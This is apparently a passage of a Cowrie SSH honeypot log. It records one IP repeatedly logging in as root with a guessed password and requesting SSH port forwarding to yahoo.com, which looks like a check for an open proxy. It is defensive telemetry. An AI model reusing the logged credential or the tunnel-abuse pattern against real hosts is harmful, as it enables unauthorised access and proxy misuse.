{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":11917,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:11917","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.986894Z","session":"1543f040a636"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.043541Z","src_ip":"213.209.150.239","session":"1543f040a636"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.100886Z","src_ip":"213.209.150.239","session":"1543f040a636"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39519,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1cc0ddb9f6c","protocol":"ssh","message":"New connection: 213.209.150.239:39519 (1.2.3.4:22) [session: a1cc0ddb9f6c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.156716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.157369Z","src_ip":"213.209.150.239","session":"a1cc0ddb9f6c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.214179Z","src_ip":"213.209.150.239","session":"a1cc0ddb9f6c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.497007Z","src_ip":"213.209.150.239","session":"a1cc0ddb9f6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":693,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:693","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.555610Z","session":"a1cc0ddb9f6c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.612618Z","src_ip":"213.209.150.239","session":"a1cc0ddb9f6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":24715,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24715","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.767192Z","session":"a1cc0ddb9f6c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.824146Z","src_ip":"213.209.150.239","session":"a1cc0ddb9f6c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.881536Z","src_ip":"213.209.150.239","session":"a1cc0ddb9f6c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39585,"dst_ip":"1.2.3.4","dst_port":22,"session":"066ebd3d5734","protocol":"ssh","message":"New connection: 213.209.150.239:39585 (1.2.3.4:22) [session: 066ebd3d5734]","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.937466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.938418Z","src_ip":"213.209.150.239","session":"066ebd3d5734"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:00.995000Z","src_ip":"213.209.150.239","session":"066ebd3d5734"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.278649Z","src_ip":"213.209.150.239","session":"066ebd3d5734"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":31031,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:31031","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.336324Z","session":"066ebd3d5734"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.393222Z","src_ip":"213.209.150.239","session":"066ebd3d5734"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10561,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10561","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.547305Z","session":"066ebd3d5734"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.604470Z","src_ip":"213.209.150.239","session":"066ebd3d5734"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.662040Z","src_ip":"213.209.150.239","session":"066ebd3d5734"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39644,"dst_ip":"1.2.3.4","dst_port":22,"session":"e928038f55e0","protocol":"ssh","message":"New connection: 213.209.150.239:39644 (1.2.3.4:22) [session: e928038f55e0]","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.718036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.720065Z","src_ip":"213.209.150.239","session":"e928038f55e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:01.776777Z","src_ip":"213.209.150.239","session":"e928038f55e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.059945Z","src_ip":"213.209.150.239","session":"e928038f55e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1071,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1071","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.117647Z","session":"e928038f55e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.174864Z","src_ip":"213.209.150.239","session":"e928038f55e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16880,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16880","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.331178Z","session":"e928038f55e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.388105Z","src_ip":"213.209.150.239","session":"e928038f55e0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.446499Z","src_ip":"213.209.150.239","session":"e928038f55e0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39700,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a1a2ff1167c","protocol":"ssh","message":"New connection: 213.209.150.239:39700 (1.2.3.4:22) [session: 5a1a2ff1167c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.502265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.503187Z","src_ip":"213.209.150.239","session":"5a1a2ff1167c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.559672Z","src_ip":"213.209.150.239","session":"5a1a2ff1167c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.841874Z","src_ip":"213.209.150.239","session":"5a1a2ff1167c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":17660,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17660","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.900018Z","session":"5a1a2ff1167c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:02.956948Z","src_ip":"213.209.150.239","session":"5a1a2ff1167c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26122,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26122","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.115059Z","session":"5a1a2ff1167c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.171923Z","src_ip":"213.209.150.239","session":"5a1a2ff1167c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.229599Z","src_ip":"213.209.150.239","session":"5a1a2ff1167c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39762,"dst_ip":"1.2.3.4","dst_port":22,"session":"e63f0543c6b6","protocol":"ssh","message":"New connection: 213.209.150.239:39762 (1.2.3.4:22) [session: e63f0543c6b6]","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.285381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.286307Z","src_ip":"213.209.150.239","session":"e63f0543c6b6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.343071Z","src_ip":"213.209.150.239","session":"e63f0543c6b6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.625778Z","src_ip":"213.209.150.239","session":"e63f0543c6b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":23234,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23234","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.684563Z","session":"e63f0543c6b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.741416Z","src_ip":"213.209.150.239","session":"e63f0543c6b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":30438,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30438","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.895226Z","session":"e63f0543c6b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:03.952277Z","src_ip":"213.209.150.239","session":"e63f0543c6b6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.011175Z","src_ip":"213.209.150.239","session":"e63f0543c6b6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39825,"dst_ip":"1.2.3.4","dst_port":22,"session":"d49f084d4ca0","protocol":"ssh","message":"New connection: 213.209.150.239:39825 (1.2.3.4:22) [session: d49f084d4ca0]","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.057080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.058254Z","src_ip":"213.209.150.239","session":"d49f084d4ca0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd